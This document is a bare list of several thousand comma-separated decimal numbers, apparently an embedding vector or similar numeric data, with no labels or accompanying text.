-0.023831501603126526, -0.0011691529070958495, -0.005433357786387205, 0.02431197464466095, -0.028155764564871788, -0.02130100503563881, 0.008896773681044579, -0.009649516083300114, -0.011090937070548534, 0.009177049621939659, -0.013140958733856678, -0.02927687019109726, 0.002452418440952897, 0.008824702352285385, 0.01739315129816532, 0.006518428213894367, -0.03002961352467537, 0.02128499001264572, 0.0004431870474945754, -0.0006586494855582714, 0.01435015071183443, 0.017040804028511047, -0.014654451049864292, -0.03706054762005806, 0.034337859600782394, -0.014926719479262829, -0.0013283098815008998, -0.023222900927066803, 0.016304077580571175, 0.010506360791623592, -0.021317021921277046, -0.03034992888569832, 0.033697228878736496, -0.00017830083379521966, 0.005193121265619993, 0.0574326366186142, -0.003455407451838255, 0.012332160957157612, 0.0034253778867423534, 0.035715218633413315, -0.009665531106293201, 0.013221037574112415, 0.018562303856015205, 0.02857217565178871, -0.028219828382134438, 0.037412893027067184, -0.008019908331334591, 0.0026085723657160997, 0.021765463054180145, 0.006998901721090078, -0.03824571520090103, -0.010674525983631611, -0.010089949704706669, -0.026730358600616455, 0.017937688156962395, -0.012580405920743942, -0.04013557732105255, -0.0408402718603611, -0.0006621529464609921, 0.03404957801103592, -0.0395590104162693, -0.0009849712951108813, -0.013997803442180157, 0.01563141494989395, 0.0031811369117349386, -0.020516231656074524, -0.006406317465007305, -0.017761515453457832, 0.022021716460585594, 0.016432203352451324, -0.022197889164090157, 0.0022622307296842337, 0.013469282537698746, -0.024023691192269325, -0.017361119389533997, -0.006466376595199108, 0.005381306633353233, 0.006986889988183975, -0.011347189545631409, 0.012556382454931736, 0.022085778415203094, 0.0023423098027706146, -0.02480846457183361, 0.0038778239395469427, -0.04737471789121628, 0.01362944021821022, -0.027931543067097664, -0.008864741772413254, -0.009601468220353127, -0.01833808422088623, 0.017633387818932533, 0.0008228113874793053, -0.008280165493488312, 0.025657301768660545, -0.006210124120116234, 0.043370768427848816, -0.028620222583413124, 0.008296181447803974, -0.01115499995648861, -0.017601357772946358, 0.0032291843090206385, 0.007655549328774214, -0.04256998002529144, -0.0034093621652573347, 0.003371324623003602, -0.0013002821942791343, 0.01784159429371357, -0.004428367130458355, -0.00031305872835218906, 0.007651545573025942, -0.016848614439368248, -0.00656647514551878, -0.01734510436654091, 0.02927687019109726, -0.0024904559832066298, 0.012604429386556149, 0.044011399149894714, -0.0057256463915109634, -0.015591374598443508, -0.0005935853696428239, -0.01347729004919529, 0.008095983415842056, -0.010250108316540718, -0.02938898093998432, 0.006622530519962311, -0.005821741186082363, -0.03324878588318825, -0.007851743139326572, -0.00739529263228178, 0.005925843492150307, -0.02304672636091709, 0.016344117000699043, -0.020372088998556137, 0.01573551632463932, 0.023030711337924004, 0.004724659025669098, -0.005249176174402237, -0.01897871494293213, 0.005805725231766701, 0.0019379110308364034, -0.026089727878570557, -0.0015995773719623685, 0.00244240858592093, 0.0024824480060487986, -0.005153081379830837, -0.018514256924390793, -0.014654451049864292, 0.018674414604902267, -0.0018348093144595623, -0.0027507124468684196, 0.027723338454961777, 0.009441310539841652, 0.013180998153984547, -0.029372965916991234, -0.024424085393548012, 0.020436152815818787, 0.010154013521969318, 0.0022482171189039946, 0.013429243117570877, 0.021893590688705444, 0.01646423526108265, 0.029004601761698723, 0.021397100761532784, -0.0013753562234342098, 0.017505262047052383, -0.020195916295051575, -0.03174330294132233, -0.01846620999276638, 0.008240126073360443, 0.009665531106293201, 0.023254932835698128, -0.027435055002570152, -0.011395237408578396, 0.011219063773751259, 0.045516885817050934, -0.005068998783826828, -0.04260201007127762, 0.0040059504099190235, -0.03606756776571274, 0.04321061074733734, -0.005141069646924734, 0.014053858816623688, -0.004082025494426489, 0.004140082746744156, -0.037541020661592484, -0.002428394742310047, 0.011203047819435596, 0.0010650502517819405, -0.014574372209608555, 0.036964450031518936, -0.014718513935804367, 0.0037577056791633368, -0.002362329512834549, -0.008136022835969925, 0.004732667002826929, -0.023335011675953865, -0.010081942193210125, 0.0032291843090206385, -0.03798946365714073, -0.028059670701622963, 0.004872804973274469, 0.022037731483578682, -0.011227071285247803, -0.04490828514099121, 0.008624505251646042, -0.06233346834778786, 0.022838521748781204, 0.010618471540510654, -0.027723338454961777, 0.021188894286751747, -0.0038658122066408396, -0.002222191309556365, -0.010946795344352722, 0.00818006694316864, -0.016816582530736923, 0.045773137360811234, -0.03555506095290184, -0.01607985608279705, -0.002232201164588332, 0.019683409482240677, 0.004172114189714193, 0.01111496053636074, -0.0039458912797272205, 0.00637828977778554, 0.018434178084135056, -0.011066913604736328, -0.03233588859438896, -0.022630317136645317, -0.025288937613368034, -0.02142913267016411, 0.012228058651089668, -0.010458312928676605, 0.017489247024059296, 0.015319106169044971, 0.030686261132359505, 0.0312628298997879, -0.011587426997721195, 0.00864052027463913, -0.003407360054552555, 0.011755592189729214, -0.017441200092434883, -0.019186921417713165, 0.04987318068742752, -0.010898747481405735, 0.004536473657935858, 0.015583367086946964, -0.023318994790315628, -0.001777753117494285, -0.022646332159638405, 0.0033212751150131226, 0.012772595509886742, 0.022502189502120018, -0.0027727342676371336, -0.014910703524947166, -0.028412017971277237, -0.009633500128984451, -0.00398192647844553, -0.01941114105284214, 0.01795370504260063, 0.018706446513533592, -0.006506416015326977, -0.006606515031307936, 0.00970557052642107, -0.03289644047617912, -0.021877573803067207, -0.025849491357803345, -0.03971916809678078, 0.008400283753871918, -0.010306162759661674, 0.016095872968435287, -0.015215003862977028, 0.0015034825773909688, 0.005385310389101505, 0.0021781479008495808, 0.00913701020181179, -0.026297932490706444, 0.033569104969501495, -0.0244401004165411, 0.004776710644364357, -0.012003837153315544, -0.010602455586194992, 0.03718867152929306, -0.004448386840522289, 0.021509211510419846, 0.018065815791487694, -0.028604207560420036, -0.0046325684525072575, 0.01577555574476719, -0.0021240946371108294, -0.024151816964149475, -0.04699033871293068, 0.004704639315605164, 0.0012061895104125142, 0.002718681003898382, -0.020147867500782013, -0.0031571132130920887, 0.0202279482036829, -0.043306704610586166, -0.0023923590779304504, -0.011723561212420464, 0.00879267044365406, -0.025785427540540695, 0.004496434237807989, 0.020259978249669075, 0.04881613701581955, -0.010922770947217941, -0.011571411043405533, 0.03757305070757866, -0.016031809151172638, 0.012892713770270348, -0.026714343577623367, -0.05240367725491524, 0.015487272292375565, 0.0061941081658005714, -0.038726188242435455, -0.01796972006559372, 0.008712591603398323, 0.00802791677415371, 0.037348829209804535, -0.016384156420826912, -0.028187796473503113, -0.018674414604902267, -0.0333128497004509, -0.006098013371229172, -0.027162786573171616, 0.0036576068960130215, -0.0102420998737216, -0.03211166709661484, -0.009153026156127453, 0.0333128497004509, 0.006382293533533812, -0.005229156464338303, 0.011291134171187878, 0.011963797733187675, -0.0015164954820647836, -0.012732556089758873, -0.007082984782755375, -0.016912678256630898, -0.0165282990783453, -0.04324264079332352, 0.019811537116765976, 0.0049248565919697285, 0.054613854736089706, -0.02506471611559391, -0.0008448330918326974, 0.024295959621667862, 0.005137065891176462, -0.0015995773719623685, -0.027915528044104576, -0.020948657765984535, 0.011811647564172745, 0.006914818659424782, 0.035715218633413315, -0.010538391768932343, -0.012876697815954685, -0.03034992888569832, 0.01435015071183443, 0.017425183206796646, 0.003245200263336301, -0.02280648984014988, 0.0028708309400826693, 0.015471256338059902, -0.037733208388090134, 0.0049769077450037, 0.01275657955557108, 0.011707545258104801, 0.009265136905014515, 0.006874779239296913, 0.04333873838186264, -0.01891465298831463, 0.007135035935789347, -0.004600536543875933, -0.05083413049578667, -0.007627521641552448, -0.03214369714260101, -0.045516885817050934, 0.010882731527090073, -0.02054826356470585, -0.0016185961430892348, -0.0066545624285936356, -0.017601357772946358, -0.029180776327848434, 0.03132689371705055, 0.0038477943744510412, 0.026778407394886017, -0.017425183206796646, -0.013517329469323158, 0.014181985519826412, 0.009537405334413052, -0.03744492679834366, 0.013781590387225151, -0.02280648984014988, -0.0407121479511261, -0.005645567085593939, -0.004448386840522289, -0.011539379134774208, 0.04359498992562294, 0.001163147040642798, 0.03786133602261543, 0.011691529303789139, -0.009913776069879532, -0.013373187743127346, -0.018882621079683304, -0.00719509506598115, -0.05320446565747261, 0.024215880781412125, -0.008824702352285385, -0.02738700620830059, -0.000011394048669899348, 0.021701401099562645, 0.014950742945075035, -0.013325139880180359, 0.019811537116765976, -0.0031210777815431356, 0.02222992107272148, 0.005757677834481001, -0.02618582174181938, 0.04461999982595444, 0.0036796284839510918, -0.01582360453903675, -0.022197889164090157, 0.012684508226811886, -0.0325440913438797, -0.02525690570473671, 0.011995829641819, 0.007643537595868111, 0.019250983372330666, -0.0017156918765977025, 0.006886791437864304, -0.006642550230026245, 0.01665642485022545, -0.03536287322640419, 0.018514256924390793, 0.009345215745270252, -0.012524350546300411, -0.020003726705908775, 0.009753618389368057, -0.02261430025100708, 0.009857720695436, 0.006238151807337999, -0.005177105311304331, 0.010826676152646542, 0.04625361040234566, -0.007667561061680317, -0.00951338093727827, -0.017697451636195183, 0.002080051228404045, 0.01197180524468422, 0.0312628298997879, -0.010650502517819405, -0.004280220717191696, 0.023671342059969902, 0.018610352650284767, 0.01909082569181919, 0.004280220717191696, -0.0050730025395751, -0.003501452971249819, -0.001976949628442526, -0.023014694452285767, 0.0029449041467159986, -0.03699648380279541, 0.004892825148999691, -0.00028653256595134735, 0.027178801596164703, 0.025032686069607735, -0.035523030906915665, -0.02487252652645111, -0.01011397410184145, 0.037284769117832184, 0.034401923418045044, 0.0035434942692518234, -0.009489357471466064, 0.00005602399687631987, 0.0020169890485703945, -0.006970874033868313, 0.06111626699566841, -0.02235804870724678, -0.004428367130458355, -0.002476442139595747, 0.0066625699400901794, 0.009569436311721802, 0.021957652643322945, -0.006582491099834442, -0.015463248826563358, -0.03167923912405968, 0.02745107002556324, -0.019250983372330666, -0.01426206436008215, -0.0001915639004437253, 0.0017587343463674188, 0.02970929630100727, -0.0002900359977502376, 0.014093898236751556, -0.0056255473755300045, 0.009817681275308132, -0.019299032166600227, -0.035587094724178314, 0.02211781032383442, -0.016736503690481186, 0.0312628298997879, -0.02130100503563881, 0.008656536228954792, -0.01077062077820301, -0.003457409329712391, -0.026490122079849243, 0.017008772119879723, 0.02261430025100708, -0.04942473769187927, 0.03392145037651062, 0.00045094467350281775, -0.014710506424307823, 0.002882842905819416, -0.020564278587698936, -0.023351026698946953, -0.030542118474841118, -0.007771663833409548, -0.009585452266037464, -0.02267836406826973, 0.010730581358075142, 0.007163063623011112, 0.04916848614811897, 0.0404558964073658, -0.013829637318849564, -0.006874779239296913, -0.012180010788142681, 0.0005640562158077955, -0.015415200963616371, 0.028283892199397087, 0.005613535642623901, 0.010554407723248005, 0.03593944013118744, 0.016624392941594124, -0.0028908506501466036, 0.008091979660093784, 0.022646332159638405, 0.009313183836638927, -0.0036596087738871574, -0.0002937897224910557, 0.012476303614675999, 0.01728104054927826, -0.01029815524816513, 0.008188074454665184, 0.02387954853475094, -0.006738645024597645, -0.004428367130458355, -0.013517329469323158, 0.011627466417849064, -0.02205374836921692, -0.010850700549781322, 0.006430340930819511, -0.03654804080724716, -0.016544314101338387, -0.007851743139326572, 0.017425183206796646, 0.02719481661915779, 0.007323221769183874, 0.002094065072014928, -0.015182971954345703, 0.0033352889586240053, -0.006065981928259134, -0.0017036800272762775, 0.006762668956071138, -0.009985847398638725, -0.011018865741789341, -0.010498352348804474, -0.01840214617550373, 0.03478630259633064, -0.000662653474137187, 0.004228169564157724, -0.007803695276379585, -0.00027026652242057025, -0.019299032166600227, 0.012476303614675999, 0.03475427255034447, -0.020756468176841736, -0.002524489536881447, -0.01039425004273653, 0.006574483122676611, -0.0399433895945549, -0.025481127202510834, 0.007371269166469574, 0.012460287660360336, 0.023671342059969902, 0.018818557262420654, 0.007062965072691441, -0.030446022748947144, -0.020275995135307312, 0.003893839893862605, 0.003711660159751773, 0.04365905374288559, -0.006057973951101303, -0.0032972514163702726, -0.004696631338447332, -0.002652615774422884, 0.0241838488727808, 0.04923254996538162, 0.011363205499947071, 0.0029689278453588486, -0.03901447355747223, -0.01426206436008215, 0.01909082569181919, 0.03161517530679703, -0.00019006241927854717, 0.007339237257838249, -0.003997942432761192, -0.01105890516191721, 0.00876063946634531, 0.0012872694060206413, -0.00986572913825512, -0.01573551632463932, -0.009873736649751663, -0.0328003466129303, 0.004676611628383398, 0.0028087696991860867, -0.01777753047645092, -0.009064938873052597, -0.004684619605541229, 0.001711687888018787, 0.002732694847509265, -0.009297167882323265, 0.02149319462478161, -0.012404232285916805, 0.03555506095290184, 0.013621432706713676, -0.005341267213225365, 0.013581393286585808, 0.006826731842011213, 0.011491332203149796, -0.0118997348472476, -0.007082984782755375, -0.035138651728630066, -0.01840214617550373, -0.007935825735330582, -0.02863623946905136, -0.020308027043938637, -0.0027747361455112696, 0.013645456172525883, 0.007251150440424681, 0.013333148322999477, -0.038790252059698105, -0.021461162716150284, -0.0059738908894360065, 0.013685495592653751, -0.005068998783826828, 0.007375272922217846, 0.00793182197958231, -0.02551315911114216, -0.007903793826699257, 0.040103547275066376, 0.026714343577623367, 0.0024744400288909674, 0.01340521965175867, 0.0015265053370967507, -0.01816190965473652, 0.03140697255730629, -0.02732294425368309, -0.006466376595199108, 0.005281208083033562, -0.0073432414792478085, -0.0001215573720401153, -0.011203047819435596, 0.02368735894560814, 0.022662347182631493, 0.040231674909591675, 0.010402257554233074, -0.003139095613732934, -0.0009254125761799514, 0.0025084735825657845, 0.011427268385887146, 0.001732708653435111, 0.00030655230511911213, -0.006037954241037369, 0.014934727922081947, 0.040039483457803726, 0.019331062212586403, -0.010922770947217941, 0.0001701678120298311, -0.016432203352451324, -0.00767957279458642, 0.011146992444992065, -0.0012021855218335986, 0.02564128488302231, 0.03028586506843567, -0.0015605388907715678, 0.0005047477316111326, 0.025977617129683495, -0.011819656006991863, -0.015343130566179752, -0.02162132039666176, -0.019122857600450516, -0.00010522876982577145, 0.02173343114554882, -0.01979552023112774, -0.017921673133969307, 0.029869455844163895, 0.011923758313059807, -0.021349051967263222, -0.015247035771608353, -0.013557368889451027, 0.005661583039909601, 0.0020440155640244484, 0.029549138620495796, 0.0024323987308889627, 0.01068253442645073, 0.019010746851563454, -0.04779112711548805, 0.030750323086977005, -0.0028227835427969694, -0.021012721583247185, 0.014838633127510548, 0.024087753146886826, 0.015791572630405426, -0.023463137447834015, -0.017232993617653847, -0.018626367673277855, -0.031246813014149666, 0.007391288876533508, -0.0033092633821070194, -0.0049849157221615314, -0.012300129048526287, -0.02016388438642025, -0.0009259130456484854, 0.02160530537366867, 0.0038097568321973085, -0.015543327666819096, -0.015791572630405426, 0.04106449335813522, 0.00767957279458642, -0.0003968913806602359, -0.02059631049633026, -0.03449802100658417, 0.00045795159530825913, 0.009649516083300114, -0.01758534088730812, 0.004684619605541229, 0.005941859446465969, 0.02865225449204445, -0.01579958014190197, 0.0013703512959182262, 0.04026370495557785, -0.025224875658750534, 0.0033693225122988224, -0.0018107856158167124, -0.00951338093727827, -0.010650502517819405, 0.0017997748218476772, 0.03158314526081085, -0.0037036521825939417, -0.02317485399544239, 0.007463359739631414, 0.026602232828736305, 0.02016388438642025, 0.03385738655924797, 0.000708698877133429, -0.015471256338059902, 0.0011781618231907487, -0.012780603021383286, 0.005201128777116537, 0.021124832332134247, -0.058201394975185394, 0.012796618975698948, 0.003961906768381596, -0.019058793783187866, -0.00014389189891517162, -0.018418163061141968, -0.0003941386821679771, 0.007611505687236786, 0.013293108902871609, -0.012556382454931736, 0.02977336011826992, -0.023671342059969902, 0.005257184151560068, 0.0019719444680958986, -0.003853800240904093, 0.003569520078599453, 0.014782577753067017, 0.0009334204951301217, 0.004404343198984861, 0.01569547690451145, 0.006278191227465868, 0.024392053484916687, -0.013901708647608757, -0.02078850008547306, 0.013317132368683815, -0.008256142027676105, 0.01064249500632286, -0.009713578969240189, 0.00818006694316864, -0.012364192865788937, 0.0054453699849545956, -0.0009389258921146393, -0.018065815791487694, 0.033889420330524445, 0.0023803473450243473, -0.030061645433306694, 0.004392331466078758, -0.027803417295217514, -0.023991659283638, -0.016368141397833824, 0.013773582875728607, 0.009553421288728714, 0.025977617129683495, 0.005189117044210434, -0.005125054158270359, -0.02255023643374443, 0.0159517303109169, -0.010097958147525787, -0.01318900566548109, 0.011835671029984951, -0.0279475599527359, 0.003997942432761192, 0.0075154113583266735, -0.026874501258134842, -0.00976963434368372, 0.004844777751713991, -0.01049034483730793, -0.02964523434638977, 0.048207540065050125, -0.02575339563190937, -0.00016253527428489178, 0.025593237951397896, 0.018610352650284767, 0.02160530537366867, 0.021140847355127335, -0.016095872968435287, 0.00416010245680809, 0.0008308193064294755, -0.028299907222390175, 0.015559343621134758, -0.0007137038046494126, 0.033440977334976196, -0.030013596639037132, -0.00866454467177391, -0.024408068507909775, -0.0033513049129396677, 0.010137997567653656, 0.006314226426184177, -0.0002507472818251699, 0.005357283167541027, -0.0013903711223974824, 0.004312252625823021, -0.007623517885804176, -0.018241988494992256, -0.031054623425006866, -0.004288228694349527, 0.006198111921548843, -0.006978882011026144, 0.013869677670300007, -0.006678585894405842, -0.015983762219548225, -0.001989962300285697, 0.0242479108273983, 0.027354976162314415, 0.022774457931518555, 0.01702478900551796, 0.00123321614228189, 0.015847627073526382, 0.008648528717458248, -0.007199099287390709, -0.004086029250174761, -0.021653352305293083, 0.006222135853022337, -0.029052648693323135, -0.003381334478035569, 0.017489247024059296, 0.010081942193210125, 0.013365179300308228, 0.01532711461186409, -0.013565377332270145, -0.006558467634022236, -0.026233870536088943, -0.03166322410106659, -0.028796397149562836, -0.0016436207806691527, 0.005837756674736738, 0.021893590688705444, 0.015311098657548428, -0.0030169750098139048, 0.012604429386556149, 0.005521444603800774, -0.02287055365741253, 0.009713578969240189, 0.00992178451269865, -0.009753618389368057, 0.00030530107324011624, 0.002198167610913515, 0.007219118997454643, -0.009489357471466064, 0.002047018613666296, -0.01953926868736744, -0.001978951506316662, 0.0006726633291691542, 0.009393262676894665, 0.0035414923913776875, -0.008584464900195599, 0.023270947858691216, 0.03411364182829857, 0.014214016497135162, -0.00854442548006773, 0.012139971368014812, -0.0034033560659736395, -0.013693503104150295, 0.01441421452909708, -0.0023343018256127834, -0.03179135173559189, 0.004098040983080864, -0.02173343114554882, 0.012332160957157612, -0.009177049621939659, 0.0009799663675948977, 0.008232117630541325, -0.004136078525334597, 0.01145930029451847, 0.037284769117832184, 0.011050897650420666, -0.011851686984300613, 0.025144796818494797, -0.006170084699988365, -0.019507236778736115, -0.005913831759244204, 0.022854536771774292, 0.0018568310188129544, 0.0005785705288872123, 0.012604429386556149, 0.006930834613740444, 0.013869677670300007, 0.0022422110196202993, -0.01271654013544321, 0.025080733001232147, -0.011251094751060009, 0.013901708647608757, -0.0035254766698926687, 0.0077476403675973415, -0.011979813687503338, 0.01564742997288704, -0.01985958404839039, -0.0070069096982479095, -0.005085014272481203, 0.0020269989036023617, 0.0245682280510664, -0.012668492272496223, 0.02448814921081066, 0.010194052942097187, -0.01665642485022545, 0.00960947573184967, 0.005385310389101505, 0.010386242531239986, -0.022950632497668266, 0.011443284340202808, 0.02162132039666176, -0.004680615849792957, 0.03246401250362396, 0.019507236778736115, 0.02669832855463028, -0.00010810660751303658, -0.0202920101583004, -0.011731568723917007, 0.01833808422088623, 0.00023610783682670444, -0.008632512763142586, 0.004420359153300524, 0.004688623361289501, -0.032512061297893524, -0.0011671509128063917, 0.005233160685747862, 0.002408375032246113, 0.0012862684670835733, 0.0017837589839473367, -0.003487439127638936, -0.0009949811501428485, 0.027675291523337364, 0.0030430008191615343, 0.00435229204595089, 0.0014614411629736423, -0.00782371498644352, -0.01498277485370636, 0.005313239526003599, -0.01507886964827776, 0.0011371213477104902, 0.017761515453457832, 0.04503641277551651, -0.0120919244363904, 0.022694379091262817, -0.0012622447684407234, 0.0029969552997499704, 0.007038941141217947, 0.002778740134090185, -0.007915806025266647, -0.010442296974360943, -0.03834180906414986, 0.013140958733856678, -0.009449318051338196, 0.008528410457074642, -0.021461162716150284, -0.0046926275826990604, 0.01039425004273653, -0.012644468806684017, -0.021060768514871597, 0.005301227793097496, -0.004792726133018732, -0.008015904575586319, 0.014558356255292892, 0.006738645024597645, -0.00841629970818758, 0.009337207302451134, 0.04420359060168266, 0.016135912388563156, 0.01941114105284214, 0.0030169750098139048, -0.005553476512432098, -0.0011591430520638824, -0.002280248561874032, -0.009665531106293201, 0.01651228405535221, -0.0009118992602452636, -0.01001787930727005, -0.011627466417849064, 0.031374938786029816, 0.011963797733187675, 0.03347300738096237, -0.007115016225725412, -0.013509321957826614, 0.019923647865653038, -0.022950632497668266, 0.016191966831684113, -0.01592770591378212, -0.015463248826563358, -0.004684619605541229, -0.004236177541315556, -0.014662458561360836, 0.01796972006559372, -0.0042401812970638275, 0.010202060453593731, 0.008648528717458248, -0.00011236080172238871, -0.010081942193210125, 0.005345270968973637, 0.008672552183270454, -0.017425183206796646, 0.00299895741045475, 0.00014576874673366547, -0.0022362051531672478, 0.01406987477093935, -0.006318230647593737, -0.008051940239965916, 0.005581504199653864, -0.009169042110443115, 0.021829526871442795, -0.017056820914149284, -0.013373187743127346, 0.004368307534605265, -0.013669479638338089, 0.0008087976020760834, -0.016023801639676094, -0.012772595509886742, 0.008232117630541325, 0.01607985608279705, -0.006338250357657671, 0.0118997348472476, -0.014798593707382679, 0.0017527283634990454, -0.014157961122691631, -0.010442296974360943, 0.006570479366928339, 0.004768702667206526, -0.016992757096886635, -0.002628592075780034, -0.035587094724178314, -0.008392276242375374, 0.01513492502272129, -0.004072015639394522, 0.0009444313473068178, -0.03204760327935219, 0.003107063937932253, -0.009441310539841652, 0.012964785099029541, 0.00976963434368372, 0.014766561798751354, 0.005325251258909702, 0.0063062189146876335, 0.014173977077007294, 0.002932892180979252, -0.00010829429083969444, 0.023222900927066803, 0.007115016225725412, 0.012059892527759075, -0.004172114189714193, 0.02613777481019497, -0.0031531094573438168, -0.02387954853475094, -0.005285211838781834, -0.008304188959300518, 0.0010760611621662974, 0.017056820914149284, -0.02600964903831482, 0.011291134171187878, -0.005829748697578907, -0.0004499437054619193, 0.008184070698916912, -0.00004247939068591222, 0.008536417968571186, 0.008148035034537315, -0.02796357497572899, -0.007859750650823116, 0.0027306927368044853, -0.003733681980520487, -0.00895282905548811, -0.011259103193879128, -0.0008383266977034509, 0.005149077624082565, 0.006826731842011213, -0.005141069646924734, -0.01829003542661667, 0.010250108316540718, -0.018738478422164917, 0.0021481183357536793, -0.017184946686029434, -0.003569520078599453, -0.001163147040642798, 0.014742538332939148, -0.0021601300686597824, 0.014870664104819298, -0.02676239050924778, -0.01745721511542797, -0.028315922245383263, 0.012588413432240486, 0.034017544239759445, 0.01551930420100689, -0.009072947315871716, -0.004840773530304432, 0.014366166666150093, -0.017761515453457832, 0.00932919979095459, 0.015239027328789234, -0.005293219815939665, 0.01726502552628517, 0.014037842862308025, -0.008304188959300518, -0.0073992968536913395, -0.02500065416097641, 0.025865506380796432, 0.012180010788142681, 0.0076915849931538105, -0.0023763433564454317, -0.005845764651894569, 0.00123321614228189, 0.008944820612668991, 0.004612548742443323, 0.0037757232785224915, -0.007847738452255726, 0.0022482171189039946, 0.02128499001264572, 0.009177049621939659, -0.0015295082703232765, 0.008912788704037666, 0.00908095482736826, -0.004568505100905895, 0.0019469199469313025, -0.00023398073972202837, -0.01347729004919529, 0.00038663126179017127, -0.008184070698916912, 0.020179899409413338, 0.005777697544544935, -0.013661472126841545, -0.010802652686834335, 0.019010746851563454, -0.002154124202206731, 0.019891615957021713, 0.01241223979741335, -0.006182096432894468, 0.007967857643961906, -0.006758664734661579, 0.008047936484217644, 0.010474328882992268, -0.022085778415203094, -0.007875766605138779, -0.016175951808691025, -0.016752520576119423, 0.024408068507909775, -0.010970818810164928, 0.011467307806015015, -0.001987960422411561, 0.010442296974360943, 0.011635473929345608, 0.009849713183939457, 0.003971916623413563, 0.012524350546300411, 0.00832020491361618, 0.011963797733187675, 0.002254222985357046, 0.03808555752038956, 0.013549361377954483, 0.006642550230026245, 0.012796618975698948, -0.002988947555422783, -0.0035174686927348375, -0.010562416166067123, -0.013148966245353222, 0.0029388980474323034, -0.009473341517150402, -0.024904558435082436, 0.009937799535691738, 0.011283126659691334, -0.005645567085593939, -0.011795631609857082, -0.007223122753202915, -0.01985958404839039, -0.0009113987325690687, -0.0025965606328099966, 0.017889641225337982, -0.005461385473608971, 0.013341155834496021, 0.0020269989036023617, 0.009016891941428185, -0.03856603056192398, 0.007455351762473583, 0.0031611172016710043, 0.0017477234359830618, 0.011443284340202808, -0.014254055917263031, 0.004964896012097597, -0.006966870278120041, 0.0049248565919697285, -0.004360300023108721, 0.03095852956175804, -0.009649516083300114, -0.004688623361289501, -0.005833752918988466, -0.010506360791623592, 0.015583367086946964, -0.0059178355149924755, 0.01747323013842106, -0.016352124512195587, 0.010650502517819405, 0.013493306003510952, 0.004696631338447332, -0.01601579412817955, 0.0036996484268456697, -0.001302284188568592, -0.011507347226142883, 0.016736503690481186, -0.005641563329845667, -0.015070862136781216, -0.004636572208255529, -0.017505262047052383, 0.011419260874390602, -0.00007388536323560402, -0.00672262953594327, 0.011811647564172745, 0.02807568572461605, -0.0042962366715073586, 0.03869415819644928, -0.0016005784273147583, -0.00002170890729757957, 0.016800567507743835, -0.0002787749108392745, -0.029725313186645508, -0.007951841689646244, 0.021701401099562645, 0.02713075466454029, -0.00773963239043951, -0.010258115828037262, -0.01563141494989395, -0.013669479638338089, -0.017553308978676796, -0.004620556253939867, -0.015206996351480484, -0.0330565981566906, 0.0009048923384398222, 0.0043562958016991615, -0.006462372839450836, 0.01644822023808956, 0.002430396620184183, 0.023479152470827103, 0.007247146684676409, -0.003223178442567587, -0.007847738452255726, 0.010954802855849266, 0.0027547164354473352, 0.007231130730360746, 0.003595545655116439, 0.023895563557744026, 0.0038818279281258583, 0.01822597347199917, 0.019619347527623177, -0.005865784361958504, -0.016992757096886635, -0.023911580443382263, -0.00797586515545845, -0.010129989124834538, 0.018498241901397705, 0.018177926540374756, -0.004752686712890863, 0.01231614500284195, -0.025865506380796432, 0.032576125115156174, 0.009048922918736935, -0.014550348743796349, 0.007855746895074844, -0.008232117630541325, 0.003631581086665392, 0.01130715012550354, 0.006550459656864405, 0.00246643228456378, -0.0047646984457969666, -0.0024364024866372347, 0.015198987908661366, 0.021813509985804558, -0.003791739232838154, -0.016816582530736923, -0.0013453266583383083, -0.0022422110196202993, -0.006738645024597645, 0.009529396891593933, -0.010906754992902279, 0.00653043994680047, 0.00374569371342659, 0.012212042696774006, 0.0007827719091437757, 0.0025725369341671467, 0.00574966985732317, 0.002478444017469883, 0.02532096952199936, 0.02777138538658619, 0.018946683034300804, 0.00957744475454092, 0.018482225015759468, 0.014998790808022022, 0.014093898236751556, -0.01607985608279705, 0.0048087420873343945, -0.024167831987142563, -0.0029789377003908157, 0.016280055046081543, -0.0013223040150478482, -0.03193549066781998, 0.005517440848052502, 0.01068253442645073, -0.008051940239965916, 0.013733543455600739, -0.005489413160830736, 0.013949756510555744, -0.010938786901533604, 0.010386242531239986, 0.0033673206344246864, 0.020580295473337173, -0.01909082569181919, 0.004420359153300524, -0.014109914191067219, -0.02362329512834549, -0.006278191227465868, 0.0246322900056839, -0.015815597027540207, 0.006402313709259033, 0.017297057434916496, -0.004236177541315556, -0.014366166666150093, 0.0015315102646127343, 0.003407360054552555, -0.011267110705375671, -0.018946683034300804, 0.02632996439933777, 0.025032686069607735, -0.007895786315202713, 0.00986572913825512, -0.015543327666819096, -0.008015904575586319, 0.0019689416512846947, 0.0022982663940638304, -0.0008998874109238386, 0.0037997469771653414, 0.0004977408098056912, 0.0013863671338185668, 0.0072271269746124744, -0.000941928883548826, -0.01105890516191721, 0.004152094479650259, 0.008968844078481197, 0.001978951506316662, 0.017249010503292084, 0.010474328882992268, 0.021941637620329857, -0.007070973049849272, 0.0037757232785224915, 0.017745498567819595, -0.0009919782169163227, 0.002058029407635331, -0.03465817868709564, -0.006037954241037369, -0.012636461295187473, 0.0015505290357396007, 0.0017927679000422359, 0.008528410457074642, -0.009785650297999382, 0.002138108480721712, -0.00879267044365406, -0.013084903359413147, -0.027467086911201477, 0.016071848571300507, -0.00295091001316905, 0.01702478900551796, -0.023030711337924004, 0.00004088406785740517, 0.015255043283104897, -0.0040680114179849625, -0.0063102226704359055, 0.016047826036810875, -0.019427157938480377, -0.006254167295992374, -0.0028067678213119507, 0.012083915993571281, -0.006414325442165136, 0.011723561212420464, 0.009937799535691738, 0.019955677911639214, -0.016095872968435287, -0.01112296897917986, -0.008680559694766998, 0.0045164539478719234, -0.004074017517268658, -0.02078850008547306, -0.015407193452119827, 0.0018798537785187364, 0.010514368303120136, 0.0011701539624482393, -0.006258171517401934, -0.015335122123360634, 0.011811647564172745, 0.018946683034300804, 0.008216101676225662, 0.003109065815806389, 0.01664040982723236, -0.012428255751729012, 0.032752297818660736, 0.007163063623011112, -0.01708885096013546, -0.007211111020296812, -0.015054846182465553, 0.015663446858525276, 0.00021396098600234836, 0.004956888034939766, -0.004780714400112629, 0.018306052312254906, 0.012772595509886742, -0.0011481322580948472, 0.009201073087751865, -0.009321192279458046, -0.015983762219548225, -0.010874724015593529, -0.005745666101574898, 0.018882621079683304, -0.003249204019084573, 0.013245061039924622, -0.013237053528428078, 0.010666518472135067, 0.00042617027065716684, 0.0024263926316052675, -0.028107717633247375, 0.004584521055221558, 0.01444624550640583, -0.0036235733423382044, 0.008832709863781929, -0.011515355668962002, 0.004724659025669098, -0.003695644438266754, 0.0002782744122669101, 0.021685384213924408, 0.030734308063983917, -0.007723616436123848, -0.0030389968305826187, -0.017200961709022522, -0.009753618389368057, -0.003109065815806389, -0.005633555352687836, -0.0021841537673026323, 